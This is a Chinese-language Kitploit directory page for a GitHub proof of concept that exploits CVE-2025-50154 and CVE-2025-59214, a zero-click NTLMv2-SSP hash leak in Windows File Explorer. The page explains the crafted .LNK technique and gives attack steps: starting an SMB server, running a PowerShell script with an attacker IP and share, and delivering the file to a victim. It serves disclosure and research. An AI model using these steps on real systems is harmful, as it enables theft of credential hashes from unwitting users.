Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-50154 — CVE-2025-50154和CVE-2025-59214的PoC,Windows文件资源管理器中的零日漏洞,无需用户交互即可泄露NTLMv2-SSP。这是对CVE-2025-24054安全补丁的绕过。 | Kitploit
工具/GitHubGitHub/rubenformation/cve-2025-50154
漏洞分析漏洞利用横向移动学习与教育
GitHubrubenformation/cve-2025-50154

CVE-2025-50154

CVE-2025-50154和CVE-2025-59214的PoC,Windows文件资源管理器中的零日漏洞,无需用户交互即可泄露NTLMv2-SSP。这是对CVE-2025-24054安全补丁的绕过。

查看仓库网站
55155110个月前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-50154, CVE-2025-59214

Windows文件资源管理器零点击NTLMv2-SSP哈希泄露

作者:Ruben Enkaoua 与 Cymulate

第一篇博客:零点击,一个NTLM:微软安全补丁绕过(CVE-2025-50154)

第二篇博客:打了两次补丁,仍然被绕过:新的NTLM泄露(CVE-2025-50154补丁绕过)

描述


虽然微软发布了一个安全更新,修复了基于图标的NTLM哈希泄露漏洞,但我发现了一种绕过方法,仍然允许攻击者在无需用户交互的情况下获取NTLMv2-SSP哈希。

原始漏洞(近期已修补)是一个零点击NTLM哈希泄露,当explorer.exe渲染一个.LNK快捷方式文件的图标时触发,该文件的图标托管在远程SMB服务器上。
打补丁后,explorer.exe不再从远程SMB路径加载图标,从而阻止了NTLM哈希的自动泄露。

更新:CVE-2025-50154的补丁完全无效。我们报告了该问题,一个新的CVE被分配给了此漏洞:CVE-2025-59214。该POC对两个CVE都适用。

通过制作一个.LNK文件,其中包含:

  • 来自shell32.dll的默认图标
  • 指向远程SMB托管的二进制文件的目标路径

explorer.exe进程仍会获取该远程文件,以从其RT_GROUP_ICON和RT_ICON资源中提取PE图标。

DA-NTLMv2-SSP-leak

步骤


在你的服务器上启动一个Responder服务器

root@kitploit:~
# 将二进制文件(例如Taskmgr.exe)放入目录,然后运行SMB服务器。
impacket-smbserver share . -smb2support

在另一台机器上使用PowerShell制作恶意的.LNK文件,然后将其投递给受害者(恶意下载、SMB上传等)

root@kitploit:~
# 请将以下值替换为实际路径、Responder服务器IP以及服务器上的文件名。注意:可能需要20到30秒。
.\poc.ps1 -path "C:\users\user\desktop" -ip "<serverIP>" -share "<share>" -file "<payload.exe>"

explorer.exe进程将通过自动下载文件来渲染图标,查找.rsrc节中的RT_ICON和RT_GROUP_ICON头部。

备注


此代码仅供教育和研究使用。
作者对任何滥用此代码的行为不承担任何责任。
下载工具